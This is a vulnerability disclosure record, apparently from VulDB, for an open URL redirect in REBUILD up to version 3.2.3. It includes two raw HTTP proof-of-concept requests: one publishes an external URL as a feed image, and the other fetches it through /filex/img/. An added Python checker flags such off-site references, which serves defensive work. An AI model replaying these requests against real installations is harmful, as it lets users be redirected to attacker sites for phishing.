| Field | Value |
|---|---|
| Title | A URL redirection vulnerability exists in the /filex/img/** interface of the REBUILD system |

Description (suggested description, as submitted):

URL Redirection vulnerability exists in rebuild <=3.2.3

- Vulnerability Type: URL Redirection
- Vendor of Product: https://github.com/getrebuild/rebuild
- Affected Product Code Base: <=3.2.3
- Affected Component: /feeds/post/publish and /filex/img/**
- Attack Type: Remote

Request message 1:
```
POST /feeds/post/publish HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 112
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close
{"content":"333","images":["http://www.baidu.com"],"scope":"ALL","type":1,"metadata":{"entity":"Feeds"}}
```
Request message 2:
```
GET /filex/img/http://www.baidu.com?imageView2/2/w/300/interlace/1/q/100 HTTP/1.1
Host: 192.168.0.102:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close
```
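As an added example (not code from the report or from the REBUILD project), the Python check below treats the image reference accepted by /feeds/post/publish and /filex/img/** as a storage key and flags any value that is an absolute or protocol-relative URL; run over the two request messages above, it reports both. The /filex/img/ prefix handling and the storage-key assumption are mine, not the project's.

```python
import json
from typing import List, Optional
from urllib.parse import unquote, urlsplit

# Sample input, copied from the two request messages in the report above
# (constructed test data, not captured traffic).
PUBLISH_BODY = ('{"content":"333","images":["http://www.baidu.com"],"scope":"ALL",'
                '"type":1,"metadata":{"entity":"Feeds"}}')
IMG_REQUEST_LINE = ("GET /filex/img/http://www.baidu.com?imageView2/2/w/300"
                    "/interlace/1/q/100 HTTP/1.1")

# Assumption: everything after this route prefix is the image reference.
IMG_PREFIX = "/filex/img/"


def is_external_reference(value: str) -> bool:
    """True when an image reference is an absolute (scheme://host) or
    protocol-relative (//host) URL instead of a storage key.
    The value is percent-decoded first so an encoded scheme is not missed."""
    v = unquote(value).strip()
    if v.startswith("//") or v.startswith("\\\\"):
        return True
    parts = urlsplit(v)
    return bool(parts.scheme) and bool(parts.netloc)


def image_ref_from_request_line(line: str) -> Optional[str]:
    """Extract the image reference from an HTTP request line for /filex/img/**;
    returns None for any other path."""
    _method, _, rest = line.partition(" ")
    target = rest.rsplit(" HTTP/", 1)[0]
    if not target.startswith(IMG_PREFIX):
        return None
    return target[len(IMG_PREFIX):]


def flag_external_images(body: str) -> List[str]:
    """Return the entries of the publish payload's "images" list that point off-site.
    A non-empty result is what a server-side validator should reject at publish time."""
    payload = json.loads(body)
    return [img for img in payload.get("images", []) if is_external_reference(img)]


def is_redirecting_img_request(line: str) -> bool:
    """True when a /filex/img/ request carries an external URL as its image
    reference, i.e. a request that would trigger the redirect the report describes."""
    ref = image_ref_from_request_line(line)
    return ref is not None and is_external_reference(ref)


if __name__ == "__main__":
    print("off-site images in publish body:", flag_external_images(PUBLISH_BODY))
    print("filex request redirects off-site:", is_redirecting_img_request(IMG_REQUEST_LINE))
```

The same predicate can be applied to access-log request lines to find past requests that hit the redirect, or to the publish handler to reject off-site image references before they are stored.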
| Field | Value |
|---|---|
| Source | https://github.com/getrebuild/rebuild/issues/596 |
| User | Mechoy (UID 41579) |
| Submitted | 2023-03-19 06:19 PM (3 years ago) |
| Moderation | 2023-03-23 07:46 PM (4 days later) |
| Status | Accepted |
| VulDB entry | 223744 [Rebuild up to 3.2.3 /feeds/post/publish cross site scripting] |
| Points | 20 |